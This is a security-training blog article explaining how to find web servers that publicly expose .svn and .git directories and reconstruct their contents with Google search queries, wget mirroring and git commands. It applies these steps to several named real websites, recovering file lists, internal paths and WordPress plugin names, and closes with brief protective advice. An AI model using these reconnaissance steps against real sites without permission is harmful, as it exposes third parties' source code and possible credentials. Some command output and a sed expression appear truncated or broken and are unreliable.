Hacking SVN, GIT, and Mercurial

Dejan Lukan
October 30, 2012 by
Dejan Lukan

We all know that when programming with a small or large team, having a revision control in place is mandatory. We can choose from a number of revision control systems. The following ones are in widespread use worldwide:

Earn two pentesting certifications at once!

Earn two pentesting certifications at once!

Enroll in one boot camp to earn both your Certified Ethical Hacker (CEH) and CompTIA PenTest+ certifications — backed with an Exam Pass Guarantee.


Was one of the first revision control systems, and is therefore very simple, but can still be used for backing up files.


Subversion is one of the most widespread revision control systems today.


Was created by Linus Torvals and its main feature is its decentralized code view.


Is very similar to Git, but somewhat faster and simpler.


Similar to Git and Mercurial, but easier.

In this article we'll take a look at a different revision control systems accessible over the HTTP/HTTPS and what we can gain from it. We all know that most revision control systems can be configured to be accessible over proprietary protocols, SSH, HTTP, etc. We also know that most of the times we need to posses the username and password to get access to the SSH protected Git for example. But HTTP/HTTPS a protocol where everything would be strictly protected by default; in HTTP/HTTPS we must intentionally protect the directory where a revision control system lives to protect it from unauthorized use. This is why we'll take a look at what we can do with publicly accessible (over HTTP) revision control systems.

Getting usable info from SVN repository

If we Google for a string presented in the picture below, the results containing publicly available SVN revision control systems using HTTP as transport protocol are shown. The searching string first looks for ".svn" directories with title strings "Index of". If we search with only ".svn" search criterion, only irrelevant search results are found.

In the picture above we can see that the search query found two publicly accessible SVN systems:

- http://neo-layout.org/.svn/

- http://trafficbonus.com/.svn/

If we try to access one of those links, the SVN directory is presented to us as shown below:

In the .svn/ directory we can see standard SVN files and folders. This usually happens because the DocumentRoot (the web page) is part of the svn repository, which also contains the folder .svn/ that is not appropriately protected. The .svn/ directory holds administrative data about that working directory to keep a revision of each of the files and folders contained in the repository, as well as other stuff. The entries file is the most important file in the .svn directory, because it contains information about every resource in a working copy directory. It keeps information about almost anything a subversion client is interested in.

What happens if we try to checkout the project? We can see that in the output below:


# svn co http://neo-layout.org/.svn neo

svn: Repository moved permanently to 'http://neo-layout.org/.svn/'; please relocate


We can see that we can't checkout the project, which makes sense, because we're trying to checkout the ./svn folder itself. We should checkout the root of the project, which is the /. If we try that, we get the output below:


# svn co http://neo-layout.org/

svn: OPTIONS of 'http://neo-layout.org': 200 OK (http://neo-layout.org)


We're not communicating with the SVN repository, but with Apache instead: notice the 200 status OK code. We can't really checkout the project in a normal way. But let's not despair, we can still download the project manually by right-clicking every file and saving it on our disk or writing a command that does that automatically for us. We can do that with wget command as follows:


# wget -m -I .svn http://neo-layout.org/.svn/


This will successfully download the svn repository as can be seen here:


# ls -al neo-layout.org/

total 56

drwxr-xr-x 3 eleanor eleanor 4096 Oct 2 16:18 .

drwxr-xr-x 75 eleanor eleanor 36864 Oct 2 16:18 ..

drwxr-xr-x 6 eleanor eleanor 4096 Oct 2 16:18 .svn

-rw-r--r-- 1 eleanor eleanor 5155 Jul 15 2011 index.html

-rw-r--r-- 1 eleanor eleanor 61 Jul 15 2011 robots.txt


The directory neo-layout.org/ was created, which contains the important directory .svn, which in turn contains the entries file. Afterward we can cd into the working directory and issue SVN commands. An example of executing svn status is shown below:


# svn status

! neo.kbd

! stylesheet_ie7.css

! xkb.tgz

! de

! windows

! index_en.html

! favicon.ico

! mac

! installation

! grafik

! tastentierchen_fenster.svg

! kbdneo_ahk.exe

! svn

! neo.keylayout

! download

! portabel

! bsd

! kbdneo32.zip

! neo_portable.zip

! installiere_neo

! neo-logo.svg

! neo_portable.tar.gz

! chat

! tastentierchen_pingu.svg

! stylesheet.css

! neo.html

! tastentierchen_apfel.svg

! Compose.neo

! forum

! neo_kopf_trac_522x50.svg

! neo_de.xmodmap

! XCompose

! linux

! neo20.exe

! stylesheet_wiki.css

! portable

! kbdneo64.zip


The first column in the output above indicates whether an item was added, deleted or otherwise changed. We can get a whole list of supported characters that indicate file status here. All of the listed files are missing, because we didn't really checkout the repository but downloaded it with wget. But nevertheless we found out quite a lot about the actual files residing in the repository. Hm, maybe those files are actually accessible in the Apache DocumentRoot directory. Let's try to access stylesheet_ie7.css which should be present.

In the picture above we can see the representation of file stylesheet_ie7.css, which is indeed present in the DocumentRoot. We could have bruteforced the name of that file with DirBuster, but this is indeed easier and more accurate. We can try to download other files as well, which might provide us with quite more intel.

Let's also try to run svn update:


# svn update

svn: Unable to open an ra_local session to URL

svn: Unable to open repository 'file:///sol/svn/neo/www'


We were of course unable to execute that command successfully, but something interesting popped up. The name of the folder which holds the actual repository is /sol/svn/neo/www. The svn info command provides additional information about the repository:


# svn info

Path: .

URL: file:///sol/svn/neo/www

Repository Root: file:///sol/svn/neo

Repository UUID: b9310e46-f624-0410-8ea1-cfbb3a30dc96

Revision: 2429

Node Kind: directory

Schedule: normal

Last Changed Author: martin_r

Last Changed Rev: 2399

Last Changed Date: 2011-06-25 10:56:02 +0200 (Sat, 25 Jun 2011)


Notice the author and the last changed revision number and last changed date. That's quite something.

Getting usable info from GIT repository

This is inherently the same as with SVN repositories, but let's discuss the Git repositories a little further. We can use the same search query ".git" with "intitle: index of", which will search for all indexed .git repositories online. The picture below shows such a query made against Google search engine:

Among many of the publicly accessible .git repositories, the following two were the first ones:

- www.claytonking.com/.git/

- www.bjphp.org/.git/

Let's again try to checkout the repository. We can do that with the git clone command as shown below:


# git clone http://www.claytonking.com/.git/

Cloning into 'www.claytonking.com'...

fatal: http://www.claytonking.com/.git/info/refs not valid: is this a git repository?


We are again not successful in cloning the repository, because of the same reason as with SVN repositories, the actual repository is the Apache DocumentRoot directory. If we try to clone from that repository we're not successful:


# git clone http://www.claytonking.com/

Cloning into 'www.claytonking.com'...

fatal: http://www.claytonking.com/info/refs not valid: is this a git repository


Nevermind, we'll use the same approach as we did with SVN repositories: with wget command as follows:


wget -m -I .git http://www.claytonking.com/.git/

--2012-10-02 16:59:25-- http://www.claytonking.com/.git/

Resolving www.claytonking.com...

Connecting to www.claytonking.com||:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 249 [text/html]

Saving to: `www.claytonking.com/.git/index.html'

100%[===================================================================================================================================================================>] 249 --.-K/s in 0s

Last-modified header missing -- time-stamps turned off.

2012-10-02 16:59:25 (27.6 MB/s) - `www.claytonking.com/.git/index.html' saved [249/249]

FINISHED --2012-10-02 16:59:25--

Total wall clock time: 0.3s

Downloaded: 1 files, 249 in 0s (27.6 MB/s)


The wget command failed to download the .git directory. Why? We can quickly find out that access to that directory is denied as can be seen in the picture below:

So that repository is properly secured against our attack. Let's try another repository located at http://www.bjphp.org/.git/. If we try to open it in a web browser, it opens up successfully, which means that the wget command will also succeed. The following picture presents accessing the .git/ repository at host www.bjphp.org:

To download the repository we can execute the following command:


# wget -m -I .git http://www.bjphp.org/.git/


Once the repository is downloaded, we can cd into it and issue git commands. Note that the repository is quite big, so it will take some time to be fully downloaded.

If we try to execute git status we get an error about a bad HEAD object:


# git status

fatal: bad object HEAD


But we should be able to execute git status command, since all the information is contained in the .git/ folder. First we need to correct the HEAD pointer to point to the latest commit. We can do that by changing the .git/refs/heads/master and replacing the non-existing hash with an existing one. All the hashes can be found by executing the command below:


# find .git/objects/










The output was truncated, but we can still see six hashes that we can use. Let's put the last hash 86f0ae6bb797bf29700cb1d0d93e5e30a4e72b into the .git/refs/heads/master file and then execute the git status command:


# git status | head


# Initial commit


# Changes to be committed:

# (use "git rm --cached <file>..." to unstage)


# new file: mainsite/.files.list

# new file: mainsite/index.php

# new file: mainsite/license.txt

# new file: mainsite/readme.html


The command obviously succeeded, it printed the modified, added, and deleted files at a point of the 86f0ae6bb797bf29700cb1d0d93e5e30a4e72b commit. Nevertheless we can find out that the site is running WordPress and all of the filenames are also printed. Afterward we can easily find out the name of the plugins the website is using with the command below:


# git status | grep "wp-content/plugins" | sed 's/.*wp-content/plugins/([^/]*).*/1/' | sort | uniq | grep -v ".php"







We could have written a better sed query, but it works for our example. If we try to access one of the listed files in web browser, we can see that the files are indeed accessible as can be seen below:

4. Conclusion

We've seen how to pull various information from SVN and GIT repositories, but we could easily have done the same with other repository types. Having a repository publicly accessible can even lead to a total website defacement if a certain filename is found that contains all the passwords that are accessible via the web browser.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

To protect ourselves we should never leave unprotected .git/ repositories online for everyone to see. We should at least write a corresponding .htaccess file to provide at least some protection.

Dejan Lukan
Dejan Lukan

Dejan Lukan is a security researcher for InfoSec Institute and penetration tester from Slovenia. He is very interested in finding new bugs in real world software products with source code analysis, fuzzing and reverse engineering. He also has a great passion for developing his own simple scripts for security related problems and learning about new hacking techniques. He knows a great deal about programming languages, as he can write in couple of dozen of them. His passion is also Antivirus bypassing techniques, malware research and operating systems, mainly Linux, Windows and BSD. He also has his own blog available here: http://www.proteansec.com/.